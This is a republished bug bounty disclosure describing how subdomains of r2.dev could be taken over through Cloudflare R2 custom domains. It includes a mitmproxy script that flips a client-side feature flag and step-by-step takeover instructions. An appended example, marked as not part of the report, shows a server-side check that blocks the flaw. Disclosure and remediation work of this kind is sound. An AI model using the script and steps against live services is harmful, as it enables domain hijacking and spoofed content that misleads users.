Cloudflare Public Bug Bounty: Take over subdomains of r2.dev using R2 custom domains
News category: Vulnerabilities
Source: vulners.com
It is possible to take over any subdomain of r2.dev (possibly also the base domain) and have it serve the contents of an R2 bucket in your account.

Requirements

Access to R2 public buckets in the dashboard is currently behind a flag. The server-side check for access to R2 public buckets was recently removed, so you can just use a mitmproxy script to toggle the flag client-side.

```py
import json
import re

from mitmproxy import http


class R2PublicBuckets:
    async def response(self, flow: http.HTTPFlow):
        # Only rewrite the dashboard's account flags response
        if re.match(r'https?://dash\.cloudflare\.com/api/v4/accounts/[0-9a-f]{32}/flags', flow.request.url):
            data = json.loads(flow.response.text)
            # Set the flag in the response that the dashboard UI reads
            data['result']['workers']['r2_publicbuckets'] = True
            flow.response.text = json.dumps(data, separators=(',', ':'))


addons = [
    R2PublicBuckets()
]
```

Steps

1. Add r2.dev to your Cloudflare account and follow the steps until you're asked to complete zone ownership verification.
2. Create an R2 bucket if you don't already have one and add e.g. albert.r2.dev as a custom domain in the "Domain Access" section.
3. Wait a few seconds and then refresh the page. The custom domain should now show "Status: Active".
4. In case "Access to Bucket" is "Not allowed", click the three dots beside the domain and then "Enable domain".
5. Visit the custom domain and notice how it serves content from your R2 bucket.

...
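The report combines two gaps: a feature flag that is only honoured client-side, and a custom domain that becomes active although the steps stop at the zone ownership verification prompt. A server-side authorization check covering both, as an added example (not Cloudflare's code and not part of the report): the `Zone` model, account ids, status strings and function names are assumptions for illustration; only the `r2_publicbuckets` flag name comes from the report.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Zone:
    name: str        # zone apex, e.g. "example.com"
    account_id: str  # account the zone was added to
    status: str      # assumed: "pending" until ownership is verified, then "active"


# Constructed sample state: "acct-a" added r2.dev but never completed
# ownership verification; "acct-b" holds a verified zone.
ZONES = [
    Zone("r2.dev", "acct-a", "pending"),
    Zone("example.com", "acct-b", "active"),
]
# Flags as stored server-side, never as echoed back by the client.
SERVER_FLAGS = {
    "acct-a": {"r2_publicbuckets": False},
    "acct-b": {"r2_publicbuckets": True},
}


def covering_zone(hostname, account_id, zones):
    """Return the account's most specific zone that contains hostname, or None."""
    host = hostname.lower().rstrip(".")
    matches = [z for z in zones
               if z.account_id == account_id
               and (host == z.name or host.endswith("." + z.name))]
    return max(matches, key=lambda z: len(z.name), default=None)


def may_attach_custom_domain(account_id, hostname, zones=ZONES, flags=SERVER_FLAGS):
    """Decide on the server whether hostname may be bound to a bucket."""
    # 1. Feature gate is evaluated from server-side state only.
    if not flags.get(account_id, {}).get("r2_publicbuckets", False):
        return False, "feature not enabled for account"
    # 2. The hostname must fall under a zone held by the same account.
    zone = covering_zone(hostname, account_id, zones)
    if zone is None:
        return False, "no zone in this account covers the hostname"
    # 3. A zone that has not passed ownership verification grants nothing.
    if zone.status != "active":
        return False, "zone ownership not verified"
    return True, "ok"
```
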